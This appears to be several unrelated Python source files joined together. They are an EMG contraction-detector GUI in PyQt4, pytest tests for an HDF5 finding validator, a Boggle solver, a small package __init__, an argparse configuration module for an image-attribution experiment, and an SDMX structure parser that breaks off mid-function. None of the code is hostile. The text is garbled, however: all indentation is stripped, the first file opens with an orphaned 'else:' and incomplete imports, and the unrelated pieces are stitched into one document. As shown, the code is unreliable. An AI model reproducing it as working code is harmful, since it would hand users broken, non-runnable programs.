from views import base_qt4 as base
from PyQt4 import QtCore
from PyQt4.QtCore import SIGNAL
from views import config_processamento_qt4 as config_window
else:
print("Versao do python nao suportada")
# ------------------------------------------------------------------------------
import matplotlib.pyplot as plt # Showing images
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
# ------------------------------------------------------------------------------
from matplotlib.figure import Figure
import matplotlib.animation as animation
class SetupApp(QMainWindow, config_window.Ui_windowConfig):
def __init__(self, parent=None):
super(SetupApp, self).__init__(parent)
self.setupUi(self)
# Define a new signal called 'trigger' that has no arguments.
#self.trigger = QtCore.pyqtSignal()
self.setup_signals_connections()
self.tipos_de_processamento = ['Desativado', 'Simples', 'Plotter', 'Thread']
self.populate_cb()
def setup_signals_connections(self):
self.comboBox.currentIndexChanged.connect(self.setup_changed)
def populate_cb(self):
self.comboBox.clear()
for tipo in self.tipos_de_processamento:
self.comboBox.addItem(tipo)
self.comboBox.setCurrentIndex(0)
def setup_changed(self):
proc = self.comboBox.itemText(self.comboBox.currentIndex())
# print("Setup Changed to:")
# print(proc)
#self.trigger.emit(SIGNAL("proc_changed(QString)"), proc)
def closeEvent(self, q_close_event):
super(self.__class__, self).closeEvent(q_close_event)
class ContractionDetector(QMainWindow, base.Ui_MainWindow):
def __init__(self, parent=None):
super(self.__class__, self).__init__(parent)
self.setupUi(self)
self.setup_signals_connections()
self.edited_image_fig = Figure(figsize=(0.1, 0.1))
self.edited_image_canvas = FigureCanvas(self.edited_image_fig)
self.edited_image_toolbar = NavigationToolbar(
self.edited_image_canvas, self, coordinates=True)
time_example = np.linspace(0, 1, 100)
y_example = np.sin(2 * np.pi * 3 * time_example)
gca_example = self.edited_image_fig.gca()
# gca_example.hold(False)
# gca_example.plot([0]*100)
self.line, = gca_example.plot(y_example)
# gca_example.hold(False)
gca_example.set_title("MMN")
gca_example.grid(True)
gca_example.set_xlabel('Index')
gca_example.set_ylabel('MMN')
self.emg_app = ArduinoEMGPlotter(
parent=self.centralwidget,
label=self.lbl_status,
edited_image_fig=self.edited_image_fig,
line=self.line,
canvas=self.edited_image_canvas,
)
self.verticalLayoutGraph.addWidget(self.emg_app.plotHandler.plotWidget)
self.verticalLayoutGraph.removeWidget(self.label_replace)
self.label_replace.setParent(None)
self.cb_emg.toggle()
self.sl_threshould.setValue(0.25)
self.sl_threshould_value_changed(10)
self.proc_changed("Desativado")
self.edited_image_canvas.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.edited_image_canvas.updateGeometry()
self.verticalLayoutGraph.addWidget(self.edited_image_canvas)
self.edited_image_canvas.draw()
self.verticalLayoutGraph.addWidget(self.edited_image_toolbar)
# call the animator
# self.anim = animation.FuncAnimation(
# self.edited_image_fig, self.animate,
# frames=500, interval=1000, blit=True
# )
# def animate(self, i):
# self.line.set_data(
# np.arange(0, len(self.emg_app.resultado)),
# self.emg_app.resultado
# )
# return self.line,
def update_matplotlib_chart(self, y_data=None):
if y_data is None:
time_example = np.linspace(0, 1, 100)
y_data = np.sin(2 * np.pi * 3 * time_example)
gca_example = self.edited_image_fig.gca()
gca_example.lines.append(gca_example.plot(y_data))
gca_example.set_title("MMN")
gca_example.grid()
gca_example.set_xlabel('Index')
gca_example.set_ylabel('Media do sinal')
def setup_signals_connections(self):
#self.actionProcessamento.triggered.connect(self.processamento_clicked)
self.btn_start.clicked.connect(self.btn_start_clicked)
self.btn_calib.clicked.connect(self.btn_calib_clicked)
self.sl_threshould.valueChanged.connect(self.sl_threshould_value_changed)
self.cb_emg.toggled.connect(lambda x: self.emg_app.plotHandler.emg_bruto.set_visible(x))
self.cb_hbt.toggled.connect(lambda x: self.emg_app.plotHandler.hilbert.set_visible(x))
self.cb_ret.toggled.connect(lambda x: self.emg_app.plotHandler.hilbert_retificado.set_visible(x))
self.cb_env.toggled.connect(lambda x: self.emg_app.plotHandler.envoltoria.set_visible(x))
self.cb_lim.toggled.connect(lambda x: self.emg_app.plotHandler.threshold.set_visible(x))
self.cb_det.toggled.connect(lambda x: self.emg_app.plotHandler.set_detection_visible(x))
#self.connect(setup_form, SIGNAL("proc_changed(QString)"), self.proc_changed)
def proc_changed(self, new_proc):
print(new_proc)
self.emg_app.update_proc_type(new_proc)
def closeEvent(self, q_close_event):
self.emg_app.stop()
super(self.__class__, self).closeEvent(q_close_event)
def processamento_clicked(self):
setup_form.show()
def btn_start_clicked(self):
if self.emg_app.started:
self.emg_app.stop()
self.btn_start.setText('Start')
else:
self.emg_app.start()
self.btn_start.setText('Stop')
def btn_calib_clicked(self):
self.lbl_status.setText(QtCore.QString.fromUtf8("Status: Calibração não implementada."))
def sl_threshould_value_changed(self, sl_value):
# self.lbl_threshould.setText("Limiar:\n%.2f" % (sl_value * 1.0 / 100))
self.emg_app.plotHandler.set_threshold(sl_value * 1.0 / 100)
app = QApplication(sys.argv)
setup_form = SetupApp()
form = ContractionDetector()
def main():
form.show()
app.exec_()
if __name__ == "__main__":
main()
|
import pytest
from ._core import No_Exception
from .. import finding
def test_OK_finding_type():
assert isinstance(finding.OK, finding.ValidationResultStatus)
@pytest.mark.parametrize(
"h5_address, test_name, status, comment, xceptn",
[
[None, None, "exception", None, ValueError],
[None, None, "Ok", None, ValueError],
[None, None, finding.OK, None, No_Exception],
],
)
def test_exception(h5_address, test_name, status, comment, xceptn):
with pytest.raises(xceptn):
try:
finding.Finding(h5_address, test_name, status, comment)
except xceptn:
raise xceptn
else:
raise No_Exception
@pytest.mark.parametrize(
"addr, test_name, status, comment",
[
[None, None, finding.ERROR, None],
["h5_address", "test_name", finding.NOTE, "comment"],
["A", "this", finding.OK, "looks good"],
]
)
def test_Finding_str(addr, test_name, status, comment):
expect = (
"finding.Finding("
f"{addr}"
f", {test_name}"
f", finding.{status}"
f", {comment}"
")"
)
f = finding.Finding(addr, test_name, status, comment)
assert f is not None
assert str(f) == expect
def test_standard():
assert len(finding.VALID_STATUS_LIST) == 8
assert len(finding.VALID_STATUS_LIST) == len(finding.VALID_STATUS_DICT)
key_list = list(sorted(map(str, finding.TF_RESULT.keys())))
k2 = list(sorted(map(str, (False, True))))
assert key_list == k2
@pytest.mark.parametrize(
"addr, test_name, status, comment",
[
[None, None, finding.ERROR, None],
["h5_address", "test_name", finding.NOTE, "comment"],
["A", "this", finding.OK, "looks good"],
]
)
def test_Finding_make_md5(addr, test_name, status, comment):
f = finding.Finding(addr, test_name, status, comment)
if addr is None:
with pytest.raises(TypeError):
f.make_md5()
else:
md5 = f.make_md5()
assert isinstance(md5, str) # is str?
assert isinstance(int(md5, 16), int) # is hexadecimal?
# can be duplicated from same inputs (is NOT random)?
assert md5 == f.make_md5()
|
"""
File: boggle.py
Name: Tao Ke Chorng
----------------------------------------
TODO:
"""
# This is the file name of the dictionary txt file
# we will be checking if a word exists by searching through it
FILE = 'dictionary.txt'
word = []
alpha = 'qwertyuioplkjhgfdsaxzcvbnm'
counter = 1
row_of_letter = []
num_of_words = 0
printed_words = [] # store already printed words
def main():
"""
TODO: This program ask user input 16 alphabets in a specific way, then it will play the boggle game and
print out all matches.
"""
global counter
read_dictionary()
count = 1
# the while loop ask user to in put 4 rows of letters, and see it's legal or not
while True:
row = input(f'{counter} row of letters: ')
row = row.lower()
if len(row) >= 7:
if row[0] in alpha and row[2] in alpha and row[4] in alpha and row[6] in alpha:
if row[1] == ' ' and row[3] == ' ' and row[5] == ' ':
counter += 1
for j in range(len(row)):
if j % 2 == 0:
row_of_letter.append(row[j])
count += 1
if count > 4:
break
else:
print('Illegal input')
else:
print('Illegal input')
else:
print('Illegal input')
row1 = row_of_letter[:4]
row2 = row_of_letter[4:8]
row3 = row_of_letter[8:12]
row4 = row_of_letter[12:16]
board = [row1, row2, row3, row4]
# these two loops will loop over every start position to find a word
for y in range(4):
for x in range(4):
maybe_word = board[x][y] # the start position to find a word
find_word(board, x, y, maybe_word, [(x, y)])
print(f'There are {num_of_words} words in total.')
def find_word(board, x, y, maybe_word, index_lst):
"""
:param board: a list that store all four rows
:param x: the x position of a alphabet
:param y: the y position of a alphabet
:param maybe_word: to see the combination of alphabet is in dictionary or not
:param index_lst: the index position of a alphabet
:return: None
"""
global num_of_words
if maybe_word in word and len(maybe_word) >= 4:
if maybe_word not in printed_words:
printed_words.append(maybe_word)
print(f'Found \"{maybe_word}\"')
num_of_words += 1
if has_prefix(maybe_word):
for i in range(-1, 2):
for j in range(-1, 2):
if 0 <= x + i < 4 and 0 <= y + j < 4:
if (x + i, y + j) not in index_lst:
# choose
index_lst.append((x + i, y + j))
maybe_word += board[x + i][y + j]
# Explore
find_word(board, x + i, y + j, maybe_word, index_lst)
# un-choose
maybe_word = maybe_word[:len(maybe_word)-1]
index_lst.pop()
def read_dictionary():
"""
This function reads file "dictionary.txt" stored in FILE
and appends words in each line into a Python list
"""
with open(FILE, 'r') as f:
for line in f:
word.append(line.strip())
def has_prefix(sub_s):
"""
:param sub_s: (str) A substring that is constructed by neighboring letters on a 4x4 square grid
:return: (bool) If there is any words with prefix stored in sub_s
"""
for ch in word:
if ch.startswith(sub_s):
return ch.startswith(sub_s)
if __name__ == '__main__':
main()
|
from . import sample_data, tests
from .data_structures import (
StreamDataset,
StreamGrid,
StreamHandler,
StreamHierarchy,
hexahedral_connectivity,
)
from .fields import StreamFieldInfo
from .io import IOHandlerStream
|
"""
CALM
Copyright (c) 2021-present NAVER Corp.
MIT license
"""
import argparse
import munch
import importlib
import os
from os.path import join as ospj
import shutil
from util import Logger
_DATASET_NAMES = ('CUB', 'ILSVRC', 'OpenImages')
_ARCHITECTURE_NAMES = ('vgg16', 'resnet50', 'inception_v3')
_ATTRIBUTION_METHODS = ('CAM', 'CALM-EM', 'CALM-ML')
_SCORE_MAP_METHOD_NAMES = ('activation_map', 'backprop')
_SCORE_MAP_PROCESS_NAMES = (
'vanilla', 'vanilla-saliency', 'vanilla-superclass',
'jointll', 'jointll-superclass', 'jointll-superclass-mean',
'gtcond', 'gtcond-superclass', 'gtcond-superclass-mean',
'saliency',
'input_grad', 'integrated_grad', 'smooth_grad', 'var_grad')
_NORM_TYPES = ('max', 'minmax', 'clipping')
_THRESHOLD_TYPES = ('even', 'log')
_SPLITS = ('train', 'val', 'test')
_LOGGER_TYPE = ('PythonLogger')
def mch(**kwargs):
return munch.Munch(dict(**kwargs))
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def configure_data_paths(args):
train, val, test = set_data_path(
dataset_name=args.dataset_name,
data_root=args.data_root
)
data_paths = mch(train=train, val=val, test=test)
return data_paths
def set_data_path(dataset_name, data_root):
if dataset_name == 'ILSVRC':
train = test = ospj(data_root, dataset_name)
val = ospj(data_root, 'ImageNetV2')
elif dataset_name == 'CUB':
train = test = ospj(data_root, dataset_name, 'images')
val = ospj(data_root, 'CUBV2')
elif dataset_name == 'OpenImages':
train = val = test = ospj(data_root, dataset_name)
else:
raise ValueError("Dataset {} unknown.".format(dataset_name))
return train, val, test
def configure_mask_root(args):
mask_root = ospj(args.mask_root, 'OpenImages')
return mask_root
def configure_log_folder(args):
log_folder = ospj(args.save_root, args.experiment_name)
if os.path.isdir(log_folder):
if args.override_cache:
shutil.rmtree(log_folder, ignore_errors=True)
else:
raise RuntimeError("Experiment with the same name exists: {}"
.format(log_folder))
os.makedirs(log_folder)
return log_folder
def configure_log(args):
log_file_name = ospj(args.log_folder, 'log.log')
Logger(log_file_name)
def configure_reporter(args):
reporter = importlib.import_module('util').Reporter
reporter_log_root = ospj(args.log_folder, 'reports')
if not os.path.isdir(reporter_log_root):
os.makedirs(reporter_log_root)
return reporter, reporter_log_root
def configure_pretrained_path(args):
pretrained_path = None
return pretrained_path
def get_configs():
parser = argparse.ArgumentParser()
# Util
parser.add_argument('--seed', type=int)
parser.add_argument('--experiment_name', type=str, default='result')
parser.add_argument('--override_cache', type=str2bool, nargs='?',
const=True, default=False)
parser.add_argument('--workers', default=4, type=int,
help='number of data loading workers (default: 4)')
parser.add_argument('--use_load_checkpoint', type=str2bool, nargs='?',
const=True, default=False)
parser.add_argument('--load_checkpoint', type=str, default=None,
help='folder name for loading ckeckpoint')
parser.add_argument('--is_different_checkpoint', type=str2bool,
nargs='?', const=True, default=False)
parser.add_argument('--save_root', type=str, default='save')
parser.add_argument('--logger_type', type=str,
default='PythonLogger', choices=_LOGGER_TYPE)
# Data
parser.add_argument('--dataset_name', type=str, default='CUB',
choices=_DATASET_NAMES)
parser.add_argument('--data_root', metavar='/PATH/TO/DATASET',
default='dataset/',
help='path to dataset images')
parser.add_argument('--metadata_root', type=str, default='metadata/')
parser.add_argument('--mask_root', metavar='/PATH/TO/MASKS',
default='dataset/',
help='path to masks')
parser.add_argument('--proxy_training_set', type=str2bool, nargs='?',
const=True, default=False,
help='Efficient hyper_parameter search with a proxy '
'training set.')
# Setting
parser.add_argument('--architecture', default='resnet18',
choices=_ARCHITECTURE_NAMES,
help='model architecture: ' +
' | '.join(_ARCHITECTURE_NAMES) +
' (default: resnet18)')
parser.add_argument('--attribution_method', type=str, default='CAM',
choices=_ATTRIBUTION_METHODS)
parser.add_argument('--is_train', type=str2bool, nargs='?',
const=True, default=True)
parser.add_argument('--epochs', default=40, type=int,
help='number of total epochs to run')
parser.add_argument('--pretrained', type=str2bool, nargs='?',
const=True, default=True,
help='Use pre_trained model.')
parser.add_argument('--cam_curve_interval', type=float, default=.001,
help='CAM curve interval')
parser.add_argument('--resize_size', type=int, default=256,
help='input resize size')
parser.add_argument('--crop_size', type=int, default=224,
help='input crop size')
# Common hyperparameters
parser.add_argument('--batch_size', default=64, type=int,
help='Mini-batch size (default: 256), this is the total'
'batch size of all GPUs on the current node when'
'using Data Parallel or Distributed Data Parallel')
parser.add_argument('--lr', default=0.01, type=float,
help='initial learning rate', dest='lr')
parser.add_argument('--lr_decay_frequency', type=int, default=30,
help='How frequently do we decay the learning rate?')
parser.add_argument('--lr_classifier_ratio', type=float, default=10,
help='Multiplicative factor on the classifier layer.')
parser.add_argument('--momentum', default=0.9, type=float,
help='momentum')
parser.add_argument('--weight_decay', default=1e-4, type=float,
help='weight decay (default: 1e-4)',
dest='weight_decay')
parser.add_argument('--use_bn', type=str2bool, nargs='?',
const=True, default=False)
parser.add_argument('--large_feature_map', type=str2bool, nargs='?',
const=True, default=False)
parser.add_argument('--iou_thresholds', nargs='+',
type=int, default=[30, 50, 70])
# Method-specific hyperparameters
parser.add_argument('--smoothing_ksize', type=int, default=1)
parser.add_argument('--score_map_method', type=str, default='activation_map',
choices=_SCORE_MAP_METHOD_NAMES)
parser.add_argument('--score_map_process', type=str, default='vanilla',
choices=_SCORE_MAP_PROCESS_NAMES)
parser.add_argument('--norm_type', default='minmax', type=str,
choices=_NORM_TYPES)
parser.add_argument('--threshold_type', default='even', type=str,
choices=_THRESHOLD_TYPES)
parser.add_argument('--smooth_grad_nr_iter', type=int, default=50,
help='SmoothGrad number of sampling')
parser.add_argument('--smooth_grad_sigma', type=float, default=4.0,
help='SmoothGrad sigma multiplier')
parser.add_argument('--integrated_grad_nr_iter', type=int, default=50,
help='IntegratedGradient number of steps')
args = parser.parse_args()
args.log_folder = configure_log_folder(args)
configure_log(args)
args.data_root = args.data_root.strip('"')
args.data_paths = configure_data_paths(args)
args.metadata_root = ospj(args.metadata_root, args.dataset_name)
args.mask_root = configure_mask_root(args)
args.reporter, args.reporter_log_root = configure_reporter(args)
args.pretrained_path = configure_pretrained_path(args)
return args
|
import copy
from sdmxthon.model.base import InternationalString, LocalisedString, \
Annotation
from sdmxthon.model.component import Component, Dimension, TimeDimension, \
Attribute, PrimaryMeasure
from sdmxthon.model.definitions import DataStructureDefinition, \
DataFlowDefinition, ContentConstraint, DataKeySet, \
MemberSelection, CubeRegion
from sdmxthon.model.descriptors import DimensionDescriptor, \
AttributeDescriptor, MeasureDescriptor, GroupDimensionDescriptor
from sdmxthon.model.header import Contact
from sdmxthon.model.itemScheme import Agency, AgencyScheme, Codelist, Code, \
Item, ConceptScheme, Concept
from sdmxthon.model.representation import Representation, Facet
from sdmxthon.model.utils import FacetType
from sdmxthon.utils.handlers import add_list, unique_id
from sdmxthon.utils.mappings import Locale_Codes
from sdmxthon.utils.parsing_words import ORGS, AGENCIES, AGENCY, ID, \
AGENCY_ID, VERSION, NAME, DESC, LANG, XML_TEXT, URI, EMAIL, ROLE, \
DEPARTMENT, TELEPHONE, FAX, CONTACT, MAINTAINER, CODELISTS, CL, \
CODE, CONCEPTS, CS, CON, ANNOTATIONS, ANNOTATION, ANNOTATION_TITLE, \
TITLE, ANNOTATION_TYPE, TYPE_, ANNOTATION_TEXT, TEXT, CORE_REP, \
CORE_REP_LOW, ENUM, REF, XMLNS, ENUM_FORMAT, TEXT_FORMAT, \
TEXT_TYPE, TEXT_TYPE_LOW, FACETS, DSDS, DSD, DSD_COMPS, DIM_LIST, \
ATT_LIST, ME_LIST, GROUP, DIM_LIST_LOW, ATT_LIST_LOW, ME_LIST_LOW, DIM, \
TIME_DIM, ATT, COMPS, CON_ID, PAR_ID, PAR_VER, CS_LOW, LOCAL_REP, \
LOCAL_REP_LOW, ATT_REL, REL_TO, PRIM_MEASURE, DATAFLOWS, ANNOTATION_URL, \
URL, CON_ID_LOW, PARENT, GROUP_DIM_LOW, GROUP_DIM, DIM_REF, DF, \
STRUCTURE, STR_URL, STR_URL_LOW, SER_URL, SER_URL_LOW, CONSTRAINTS, \
CON_CONS, CONS_ATT, DATA_KEY_SET, DATA_KEY_SET_LOW, CUBE_REGION, \
KEY_VALUE, KEY, VALUE, TYPE, INCLUDED, INCLUDE, CONTENT_REGION
schemes_classes = {CL: Codelist, AGENCIES: AgencyScheme, CS: ConceptScheme}
items_classes = {AGENCY: Agency, CODE: Code, CON: Concept}
comp_lists_classes = {DIM_LIST: DimensionDescriptor,
ATT_LIST: AttributeDescriptor,
ME_LIST: MeasureDescriptor,
GROUP: GroupDimensionDescriptor}
comp_classes = {DIM: Dimension,
TIME_DIM: TimeDimension,
ATT: Attribute,
PRIM_MEASURE: PrimaryMeasure}
comp_lists_names = {DIM_LIST: DIM_LIST_LOW,
ATT_LIST: ATT_LIST_LOW,
ME_LIST: ME_LIST_LOW}
comp_lists_items = {DIM_LIST: [DIM, TIME_DIM],
ATT_LIST: [ATT],
ME_LIST: [PRIM_MEASURE]}
dimensions = {}
measures = {}
groups = {}
# Global dict to be used in all elements
agencies = {}
codelists = {}
concepts = {}
datastructures = {}
dataflows = {}
# Errors
errors = []
missing_rep = {"CON": [], "CS": [], "CL": []}
dsd_id = ""
def create_int_str(json_int) -> InternationalString:
json_int = add_list(json_int)
locals_list = []
for e in json_int:
if e[XML_TEXT].strip() not in ['', '\n']:
e[XML_TEXT] = " ".join(e[XML_TEXT].split())
locals_list.append(LocalisedString(locale=Locale_Codes[e[LANG]],
label=e[LANG],
content=e[XML_TEXT]))
return InternationalString(localisedStrings=locals_list)
def create_contact(json_contact) -> Contact:
node_int = [NAME, DEPARTMENT, ROLE]
node_str = [URI, EMAIL, TELEPHONE, FAX]
for e in node_int:
if e in json_contact:
json_contact[e.lower()] = create_int_str(json_contact[e])
del json_contact[e]
for e in node_str:
if e in json_contact:
json_contact[e.lower()] = add_list(json_contact.pop(e))
return Contact(**json_contact)
def format_name_description(element: any):
node = [NAME, DESC]
for e in node:
if e in element:
element[e.lower()] = create_int_str(element[e])
del element[e]
return element
def format_id(element: any):
element[ID + '_'] = element.pop(ID)
return element
def format_maintainer(element: any):
if element[AGENCY_ID] in agencies:
element[MAINTAINER] = agencies[element[AGENCY_ID]]
else:
element[MAINTAINER] = Agency(element[AGENCY_ID])
del element[AGENCY_ID]
return element
def format_annotations(item_elem: any):
annotations = []
if ANNOTATIONS in item_elem:
ann = item_elem[ANNOTATIONS]
if ANNOTATION in ann:
ann[ANNOTATION] = add_list(ann[ANNOTATION])
for e in ann[ANNOTATION]:
if ANNOTATION_TITLE in e:
e[TITLE] = e.pop(ANNOTATION_TITLE)
if ANNOTATION_TYPE in e:
e[TYPE_] = e.pop(ANNOTATION_TYPE)
if ANNOTATION_TEXT in e:
e[TEXT] = create_int_str(e[ANNOTATION_TEXT])
del e[ANNOTATION_TEXT]
if ANNOTATION_URL in e:
e[URL] = e.pop(ANNOTATION_URL)
annotations.append(Annotation(**e))
item_elem[ANNOTATIONS.lower()] = annotations
del item_elem[ANNOTATIONS]
return item_elem
def format_facets(json_fac) -> dict:
fac = {FACETS: []}
if json_fac is None:
return fac
if TEXT_TYPE in json_fac:
fac[TEXT_TYPE_LOW] = json_fac.pop(TEXT_TYPE)
for e in json_fac:
if e in FacetType:
fac[FACETS].append(Facet(facetType=e, facetValue=json_fac[e]))
return fac
def format_representation(json_rep) -> Representation:
rep = {}
node = [ENUM_FORMAT, TEXT_FORMAT]
if ENUM in json_rep:
data = json_rep[ENUM][REF]
full_id = unique_id(data[AGENCY_ID], data[ID], data[VERSION])
if full_id in codelists:
rep[CL.lower()] = codelists[full_id]
elif full_id not in missing_rep["CL"]:
missing_rep["CL"].append(full_id)
rep[CL.lower()] = full_id
for e in node:
if e in json_rep:
rep = {**rep, **format_facets(json_rep[e])}
return Representation(**rep)
def format_urls(json_elem):
if STR_URL in json_elem:
json_elem[STR_URL_LOW] = json_elem.pop(STR_URL)
if SER_URL in json_elem:
json_elem[SER_URL_LOW] = json_elem.pop(SER_URL)
return json_elem
def create_item(item_elem, item) -> Item:
if XMLNS in item_elem:
del item_elem[XMLNS]
item_elem = format_annotations(item_elem)
item_elem = format_name_description(item_elem)
item_elem = format_id(item_elem)
if CONTACT in item_elem and item == AGENCY:
item_elem[CONTACT] = add_list(item_elem[CONTACT])
contacts = []
for e in item_elem[CONTACT]:
contacts.append(create_contact(e))
item_elem[CONTACT.lower() + 's'] = contacts
del item_elem[CONTACT]
if CORE_REP in item_elem and item == CON:
item_elem[CORE_REP_LOW] = format_representation(item_elem[CORE_REP])
del item_elem[CORE_REP]
if PARENT in item_elem:
item_elem[PARENT.lower()] = item_elem.pop(PARENT)[REF][ID]
return items_classes[item](**item_elem)
def create_scheme(json_elem, scheme, item):
elements = {}
if scheme in json_elem:
json_elem[scheme] = add_list(json_elem[scheme])
for element in json_elem[scheme]:
if XMLNS in element:
del element[XMLNS]
element = format_annotations(element)
element = format_name_description(element)
full_id = unique_id(element[AGENCY_ID],
element[ID],
element[VERSION])
element = format_urls(element)
element = format_maintainer(element)
element = format_id(element)
if item in element:
element[item] = add_list(element[item])
items = []
for item_elem in element[item]:
# Dynamic
items.append(create_item(item_elem, item))
del element[item]
element['items'] = items
if scheme == AGENCIES:
agencies.update({e.id: e for e in items})
else:
element['items'] = []
# Dynamic creation with specific class
elements[full_id] = schemes_classes[scheme](**element)
return elements
def create_organisations(json_orgs):
orgs = {}
if AGENCIES in json_orgs:
if len(json_orgs) == 1 and isinstance(json_orgs[AGENCIES], dict):
ag_sch = create_scheme(json_orgs, AGENCIES, AGENCY)
return ag_sch
for e in json_orgs[AGENCIES]:
ag_sch = create_scheme(e, AGENCIES, AGENCY)
orgs = {**orgs, **ag_sch}
return orgs
def format_con_id(json_ref):
rep = {}
full_cs_id = unique_id(json_ref[AGENCY_ID],
json_ref[PAR_ID],
json_ref[PAR_VER])
if full_cs_id in concepts:
if json_ref[ID] in concepts[full_cs_id].items:
# rep[CS_LOW] = concepts[full_cs_id]
rep[CON] = concepts[full_cs_id].items[json_ref[ID]]
core_rep = concepts[full_cs_id].items[json_ref[ID]]. \
core_representation
if core_rep is not None:
cl = core_rep.codelist
if cl is not None:
rep[CL.lower()] = cl
elif json_ref[ID] not in missing_rep["CON"]:
missing_rep["CON"].append(json_ref[ID])
elif full_cs_id not in missing_rep["CS"]:
missing_rep["CS"].append(full_cs_id)
return rep
def format_relationship(json_rel, node=DIM, att_name=None):
rels = {}
if node in json_rel:
json_rel[node] = add_list(json_rel[node])
for e in json_rel[node]:
if DIM_REF in e:
element = e[DIM_REF][REF][ID]
else:
element = e[REF][ID]
if element in dimensions:
rels[element] = dimensions[element]
else:
errors.append(
{'Code': 'MS04', 'ErrorLevel': 'CRITICAL',
'ObjectID': f'{dsd_id}',
'ObjectType': 'Attribute',
'Message': f'Missing Dimension {e[REF][ID]} '
f'related to Attribute '
f'{att_name}'})
elif PRIM_MEASURE in json_rel:
if json_rel[PRIM_MEASURE][REF][ID] in measures:
rels = measures[json_rel[PRIM_MEASURE][REF][ID]]
else:
errors.append(
{'Code': 'MS05', 'ErrorLevel': 'CRITICAL',
'ObjectID': f'{dsd_id}',
'ObjectType': 'Attribute',
'Message': 'Missing Primary Measure '
f'{json_rel[PRIM_MEASURE][REF][ID]} '
f'related to Attribute {att_name}'})
elif GROUP in json_rel:
if json_rel[GROUP][REF][ID] in groups:
rels = groups[json_rel[GROUP][REF][ID]]
else:
rels = 'NoSpecifiedRelationship'
return rels
def format_component(json_comp, comp) -> Component:
rep = {}
rep_class = None
if LOCAL_REP in json_comp:
rep_class = format_representation(json_comp[LOCAL_REP])
del json_comp[LOCAL_REP]
if CON_ID in json_comp:
rep = format_con_id(json_comp[CON_ID][REF])
if CON in rep:
json_comp[CON_ID_LOW] = rep.pop(CON)
del json_comp[CON_ID]
if CS_LOW in rep:
rep_class.concept_scheme = rep[CS_LOW]
json_comp[LOCAL_REP_LOW] = rep_class
# Attribute Handling
if ATT_REL in json_comp:
json_comp[REL_TO] = format_relationship(json_comp[ATT_REL],
att_name=json_comp[ID])
del json_comp[ATT_REL]
json_comp = format_id(json_comp)
json_comp = format_annotations(json_comp)
return comp(**json_comp)
def format_component_lists(json_comp_lists, comp_list, comp):
components = {}
json_comp_lists = format_annotations(json_comp_lists)
json_comp_lists = format_id(json_comp_lists)
for e in comp:
if e in json_comp_lists:
json_comp_lists[e] = add_list(json_comp_lists[e])
for i in json_comp_lists[e]:
new_element = format_component(i, comp_classes[e])
components[new_element.id] = new_element
del json_comp_lists[e]
if comp == comp_lists_items[DIM_LIST]:
dimensions.update(components)
elif comp == comp_lists_items[ME_LIST]:
measures.update(components)
if len(components) == 0:
errors.append({'Code': 'MX02', 'ErrorLevel': 'CRITICAL',
'ObjectID': f'{dsd_id}', 'ObjectType': 'DSD',
'Message': f'DSD {dsd_id} does not have '
f'a Primary Measure'})
json_comp_lists[COMPS] = components
return comp_list(**json_comp_lists)
def format_group_dim(json_group):
if GROUP_DIM in json_group:
json_group[COMPS] = format_relationship(json_group, GROUP_DIM)
else:
json_group[COMPS] = None
del json_group[GROUP_DIM]
groups.update({json_group[ID]: json_group[COMPS]})
json_group = format_id(json_group)
return GroupDimensionDescriptor(**json_group)
def format_dsd_comps(json_comps):
node = [DIM_LIST, ME_LIST, GROUP, ATT_LIST]
comps = json_comps[DSD_COMPS]
for e in node:
if e == GROUP and e in comps:
json_comps[GROUP_DIM_LOW] = format_group_dim(comps[GROUP])
elif e in comps:
name = comp_lists_names[e]
json_comps[name] = format_component_lists(comps[e],
comp_lists_classes[e],
comp_lists_items[e])
else:
if e == DIM_LIST:
errors.append({'Code': 'MX01', 'ErrorLevel': 'CRITICAL',
'ObjectID': f'{dsd_id}', 'ObjectType': 'DSD',
'Message': f'DSD {dsd_id} does not have '
f'a DimensionList'})
elif e == ME_LIST:
errors.append({'Code': 'MX02', 'ErrorLevel': 'CRITICAL',
'ObjectID': f'{dsd_id}', 'ObjectType': 'DSD',
'Message': f'DSD {dsd_id} does not have '
f'a Primary Measure'})
del json_comps[DSD_COMPS]
return json_comps
def create_datastructures(json_dsds):
elements = {}
if json_dsds is not None and DSD in json_dsds:
json_dsds[DSD] = add_list(json_dsds[DSD])
for element in json_dsds[DSD]:
dimensions.clear()
measures.clear()
groups.clear()
element = format_annotations(element)
element = format_name_description(element)
full_id = unique_id(element[AGENCY_ID],
element[ID],
element[VERSION])
global dsd_id
dsd_id = full_id
element = format_urls(element)
element = format_maintainer(element)
element = format_id(element)
if XMLNS in element:
del element[XMLNS]
if DSD_COMPS in element:
element = format_dsd_comps(element)
del dsd_id
# Creation of DSD
if full_id not in elements:
elements[full_id] = DataStructureDefinition(**element)
else:
errors.append({'Code': 'MS06', 'ErrorLevel': 'CRITICAL',
'ObjectID': f'{full_id}', 'ObjectType': 'DSD',
'Message': f'DSD {full_id} is not unique'})
else:
errors.append(
{'Code': 'MS01', 'ErrorLevel': 'CRITICAL',
'ObjectID': None,
'ObjectType': 'DSD',
'Message': 'Not found any DSD in this file'})
return elements
def create_dataflows(json_dfs):
elements = {}
if DF in json_dfs:
json_dfs[DF] = add_list(json_dfs[DF])
for element in json_dfs[DF]:
if XMLNS in element:
del element[XMLNS]
element = format_annotations(element)
element = format_name_description(element)
if STRUCTURE in element:
agency_id = element[STRUCTURE][REF][AGENCY_ID]
id_ = element[STRUCTURE][REF][ID]
version = element[STRUCTURE][REF][VERSION]
str_id = unique_id(agency_id, id_, version)
if str_id in datastructures:
element[STRUCTURE.lower()] = datastructures[str_id]
del element[STRUCTURE]
full_id = unique_id(element[AGENCY_ID],
element[ID],
element[VERSION])
element = format_urls(element)
element = format_maintainer(element)
element = format_id(element)
# Creation of DSD
if full_id not in elements:
elements[full_id] = DataFlowDefinition(**element)
else:
raise Exception
return elements
def format_key_set(json_key_set):
json_key_set[KEY_VALUE] = add_list(json_key_set[KEY_VALUE])
key_set = {}
for e in json_key_set[KEY_VALUE]:
key_set[e[ID]] = e[VALUE]
return key_set
def format_restrictions(json_cons) -> dict:
if DATA_KEY_SET in json_cons:
json_cons[DATA_KEY_SET] = add_list(json_cons[DATA_KEY_SET])
json_cons[DATA_KEY_SET_LOW] = []
